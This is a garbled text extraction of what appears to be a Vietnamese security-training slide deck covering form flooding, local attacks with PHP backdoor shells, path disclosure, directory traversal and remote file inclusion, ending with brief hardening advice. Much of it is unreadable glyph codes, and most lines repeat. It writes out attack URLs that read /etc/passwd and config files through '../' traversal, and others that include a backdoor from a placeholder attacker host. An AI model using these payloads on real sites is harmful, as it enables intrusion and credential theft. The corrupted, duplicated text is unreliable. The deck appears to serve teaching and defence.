(cid:118)(cid:105)(cid:99)(cid:116)(cid:105)(cid:109) (cid:110)ế(cid:117) (cid:110)(cid:104)ư (cid:116)(cid:104)(cid:244)(cid:110)(cid:103) (cid:113)(cid:117)(cid:97) (cid:109)ộ(cid:116) (cid:118)(cid:224)(cid:105) (cid:99)(cid:104)ỗ (cid:121)ế(cid:117) (cid:116)(cid:114)(cid:111)(cid:110)(cid:103) (cid:99)(cid:225)(cid:99)(cid:104) (cid:120)(cid:225)(cid:99) (cid:116)(cid:104)ự(cid:99) (cid:99)ủ(cid:97) (cid:116)(cid:104)(cid:244)(cid:110)(cid:103) (cid:113)(cid:117)(cid:97) (cid:109)ộ(cid:116) (cid:118)(cid:224)(cid:105) (cid:99)(cid:104)ỗ (cid:121)ế(cid:117) (cid:116)(cid:114)(cid:111)(cid:110)(cid:103) (cid:99)(cid:225)(cid:99)(cid:104) (cid:120)(cid:225)(cid:99) (cid:116)(cid:104)ự(cid:99) (cid:99)ủ(cid:97) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101)(cid:115) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101)(cid:115) (cid:40)(cid:88)(cid:101)(cid:109) (cid:118)(cid:105)(cid:100)(cid:101)(cid:111) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101)(cid:95)(cid:105)(cid:110)(cid:106)(cid:101)(cid:99)(cid:116)(cid:105)(cid:111)(cid:110)(cid:41) (cid:40)(cid:88)(cid:101)(cid:109) (cid:118)(cid:105)(cid:100)(cid:101)(cid:111) (cid:99)(cid:111)(cid:111)(cid:107)(cid:105)(cid:101)(cid:95)(cid:105)(cid:110)(cid:106)(cid:101)(cid:99)(cid:116)(cid:105)(cid:111)(cid:110)(cid:41)

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

55.. Flood database/Flood form Flood database/Flood form

Flood database/ Flood form là gì: Flood database/ Flood form là gì:

- Đây thực ra không phải là một phương pháp hacking, - Đây thực ra không phải là một phương pháp hacking, có thể tạm xếp vào là một trong những hình thức DoS, có thể tạm xếp vào là một trong những hình thức DoS, nhưng đây là hình thức DoS vào database. nhưng đây là hình thức DoS vào database.

- Cách thức tấn công: Hacker tạo ra những script để post - Cách thức tấn công: Hacker tạo ra những script để post một cách tự động vào forum, create member, search một cách tự động vào forum, create member, search form, feedback đến một lúc nào đó thì webserver của form, feedback đến một lúc nào đó thì webserver của victim cạn kiệt bandwitch hay sự nở ra liên tục của DB victim cạn kiệt bandwitch hay sự nở ra liên tục của DB khiến dung lượng ổ cứng của victim bị full và crash cả khiến dung lượng ổ cứng của victim bị full và crash cả hệ thống hệ thống

- Xem Flood blog_yahoo_demo - Xem Flood blog_yahoo_demo

2001(c)WhiteHat Security, Inc.

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Local attack 66.. Local attack

- Là phương pháp attack khi hacker hosting cùng server - Là phương pháp attack khi hacker hosting cùng server

với victim với victim

- Công cụ sử dụng chủ yếu là dùng script backdoor - Công cụ sử dụng chủ yếu là dùng script backdoor (như r57shell.php, c99.php, remview.php) hay đối với (như r57shell.php, c99.php, remview.php) hay đối với ASP là (Ntdady.asp, 4in1.asp ) ASP là (Ntdady.asp, 4in1.asp )

- Phương pháp này rất lợi hại, biến hóa khôn lường - Phương pháp này rất lợi hại, biến hóa khôn lường - Rất nhiều Hosting trên thế giới bị exploit qua phương - Rất nhiều Hosting trên thế giới bị exploit qua phương tiếng của tiếng của

pháp này, ngay cả một số Hosting nổi pháp này, ngay cả một số Hosting nổi vietnam cũng bị (VDC, FPT…etc) vietnam cũng bị (VDC, FPT…etc) (xem demo local_basic_att, hosting.vnn.vn, (xem demo local_basic_att, hosting.vnn.vn, root_linux) root_linux)

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Path disclosure/parsing 77.. Path disclosure/parsing exploit exploit - Thường được gọi dưới một tên khác là lỗi “lộ - Thường được gọi dưới một tên khác là lỗi “lộ

đường dẫn” đường dẫn”

- Được đánh giá là lỗi có độ nguy hiểm trung bình - Được đánh giá là lỗi có độ nguy hiểm trung bình (vì nó chỉ có giá trị khi tấn công localhost (cid:61664) biết (vì nó chỉ có giá trị khi tấn công localhost (cid:61664) biết được đường dẫn của victim) được đường dẫn của victim)

- Tuy nhiên đôi khi lại khá nguy hiểm nếu để lộ ra - Tuy nhiên đôi khi lại khá nguy hiểm nếu để lộ ra

đường dẫn dẫn đến folder chứa database. đường dẫn dẫn đến folder chứa database.

lỗi khi lỗi khi

- Riêng trường hợp parsing exploit cần kết hợp cả 2 - Riêng trường hợp parsing exploit cần kết hợp cả 2 điều kiện là webserver xài IIS 5.x và phân ASP điều kiện là webserver xài IIS 5.x và phân ASP sử dụng phương pháp sử dụng phương pháp coding bị coding bị Server.MapPath Server.MapPath (xem parsing_exploit) (xem parsing_exploit)

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Traversal Dictionary Traversal Dictionary

- Hay còn gọi là Path tranversal, mức độ - Hay còn gọi là Path tranversal, mức độ nguy hiểm còn tùy thuộc vào nhiều tình nguy hiểm còn tùy thuộc vào nhiều tình huống cụ thể huống cụ thể

- Xét vd: - Xét vd:

Giả sử có 1 site bán máy nọ cho phép Giả sử có 1 site bán máy nọ cho phép client download các file tài liệu hướng dẫn client download các file tài liệu hướng dẫn sử dụng sản phẩm. Họ dùng 1 file sử dụng sản phẩm. Họ dùng 1 file download.php và sử dụng như sau: download.php và sử dụng như sau: http://[target.com]/download/download.ph http://[target.com]/download/download.ph p?file=xyz.pdf p?file=xyz.pdf

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Dictionary Traversal 88.. Dictionary Traversal (cont) (cont)

$fp = fopen($file, 'r'); $fp = fopen($file, 'r'); fpassthru($fp); // ** CORRECT ** fpassthru($fp); // ** CORRECT ** fclose($fp); fclose($fp);

?> ?> (cid:61604)

$file=$_GET['file']; $file=$_GET['file']; $filename = $file; $filename = $file;

header("Cache-control: private"); // fix for IE header("Cache-control: private"); // fix for IE header("Content-Type: application/octet-stream"); header("Content-Type: application/octet-stream"); header("Content-Length: ".filesize($filename)); header("Content-Length: ".filesize($filename)); header("Content-Disposition: attachment; header("Content-Disposition: attachment; filename=$name"); filename=$name");

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Traversal (cont) Dictionary Traversal (cont) Dictionary

Lúc đó hacker sẽ khai thác theo kiểu Lúc đó hacker sẽ khai thác theo kiểu http://[target.com]/download/download.php?file=../../c http://[target.com]/download/download.php?file=../../c onfig.php onfig.php http://[target.com]/download/download.php?file=../db. http://[target.com]/download/download.php?file=../db. php php http://[target.com]/download/download.php?file=../../.. http://[target.com]/download/download.php?file=../../.. /etc/passwd /etc/passwd Lúc đó hacker sẽ down được những file chứa thông tin Lúc đó hacker sẽ down được những file chứa thông tin rất nhạy cảm như VD trên là config.php,db.php (chứa rất nhạy cảm như VD trên là config.php,db.php (chứa thông tin connect đến database etc) hay /etc/passwd thông tin connect đến database etc) hay /etc/passwd chứa thông tin về user/pass shadow họăc chưa shadow chứa thông tin về user/pass shadow họăc chưa shadow etc etc

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

include file Remote include file Remote - Là một lỗi thông dụng trong các ứng dụng web được - Là một lỗi thông dụng trong các ứng dụng web được

viết bằng PHP viết bằng PHP

- Có liên quan mật thiết đến phương pháp local attack - Có liên quan mật thiết đến phương pháp local attack - Lợi dụng sự bất cẩn của Programmer khi dùng hàm - Lợi dụng sự bất cẩn của Programmer khi dùng hàm

include() hay require() trong PHP include() hay require() trong PHP Vd:test.php Vd:test.php include(“$ex/index.php”); ?> (cid:61664)ko bị lỗi, nhưng nếu (cid:61664)ko bị lỗi, nhưng nếu include(“$ex/index.php”); ?>

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

include file Remote include file Remote

Khi đó hacker sẽ include vào 1 file: Khi đó hacker sẽ include vào 1 file: http://www.[target].com/test.php?ex=http://www.[attacker].com/ http://www.[target].com/test.php?ex=http://www.[attacker].com/ Khi đó link sẽ include là Khi đó link sẽ include là http://www.[attacker].com/index.php http://www.[attacker].com/index.php

Index.php khi đó là một backdoor được lưu ở host hacker (host Index.php khi đó là một backdoor được lưu ở host hacker (host của hacker ko support php) của hacker ko support php) Hoặc attacker có thể dùng cách khác Hoặc attacker có thể dùng cách khác

http://www.[target].com/test.php?ex=http://www.[attacker].com/ http://www.[target].com/test.php?ex=http://www.[attacker].com/ backdoor.php backdoor.php

(đằng sau dấu ? Sẽ ignore tất cả, trường hợp này là ignore (đằng sau dấu ? Sẽ ignore tất cả, trường hợp này là ignore /index.php có sẵn trong code test.php của victim) /index.php có sẵn trong code test.php của victim)

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

include file Remote include file Remote

b/ Lỗi File include thông qua isset(), if() b/ Lỗi File include thông qua isset(), if() Test1.php Test1.php

include(“$file”); include(“$file”); […] […] ? > ? >

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

include file Remote include file Remote

Test2.php Test2.php if (!isset( $path )) $path = `/home/`; if (!isset( $path )) $path = `/home/`;

include(“$path/index.php”); include(“$path/index.php”); […] […] ? > ? > Cách khai thác: Cách khai thác: http://www.[target].com/test1.php?file=http://www.[at http://www.[target].com/test1.php?file=http://www.[at tacker].com/remview.php tacker].com/remview.php http://www.[target].com/test2.php?path=http://www.[ http://www.[target].com/test2.php?path=http://www.[ attacker].com/remview.php? attacker].com/remview.php?

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

include file Remote include file Remote

Test3.php Test3.php

[…] […]

?> ?> Cách khai thác Cách khai thác http://www.[target].com/test3.php?file=../ http://www.[target].com/test3.php?file=../

../../../../../../../etc/passwd ../../../../../../../etc/passwd

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

How to Secure? How to Secure?

1. Cẩn thận trong quá trình coding, viết một 1. Cẩn thận trong quá trình coding, viết một rules hợp lý để validate tất cả các biến rules hợp lý để validate tất cả các biến đầu đầu vào vào

2. Thường xuyên Update các hotfix, service 2. Thường xuyên Update các hotfix, service

patch cho Webserver, OS patch cho Webserver, OS

3 Dùng mod_security như một tường lửa web 3 Dùng mod_security như một tường lửa web

để chặn các cuộc tấn công để chặn các cuộc tấn công 4 Thiết lập hệ thống mạng an tòan 4 Thiết lập hệ thống mạng an tòan 5. Dùng SSL, tránh sniff trên đường truyền, 5. Dùng SSL, tránh sniff trên đường truyền,

dùng Snort để logging … dùng Snort để logging …

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

Tài liệu tham khảo

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)

(cid:84)(cid:114)(cid:117)(cid:110)(cid:103) (cid:84)(cid:226)(cid:109) (cid:272)(cid:224)(cid:111) (cid:84)ạ(cid:111) (cid:81)(cid:117)ả(cid:110) (cid:84)(cid:114)ị (cid:38)(cid:32)(cid:65)(cid:110) (cid:78)(cid:105)(cid:110)(cid:104) (cid:77)ạ(cid:110)(cid:103) (cid:65)(cid:116)(cid:104)(cid:101)(cid:110)(cid:97) (cid:50) (cid:66)(cid:105)(cid:115) (cid:272)(cid:105)(cid:110)(cid:104) (cid:84)(cid:105)(cid:234)(cid:110) (cid:72)(cid:111)(cid:224)(cid:110)(cid:103)(cid:44) (cid:80)(cid:104)ườ(cid:110)(cid:103) (cid:272)(cid:97)(cid:75)(cid:97)(cid:111)(cid:44) (cid:81)(cid:117)ậ(cid:110) (cid:49) (cid:87)(cid:101)(cid:98)(cid:115)(cid:105)(cid:116)(cid:101)(cid:32)(cid:58)(cid:32)(cid:119)(cid:119)(cid:119)(cid:46)(cid:97)(cid:116)(cid:104)(cid:101)(cid:110)(cid:97)(cid:46)(cid:101)(cid:100)(cid:117)(cid:46)(cid:118)(cid:110) (cid:84)(cid:101)(cid:108)(cid:58) (cid:56)(cid:50)(cid:52)(cid:52)(cid:48)(cid:52)(cid:49)

(cid:65)(cid:84)(cid:72)(cid:69)(cid:78)(cid:65)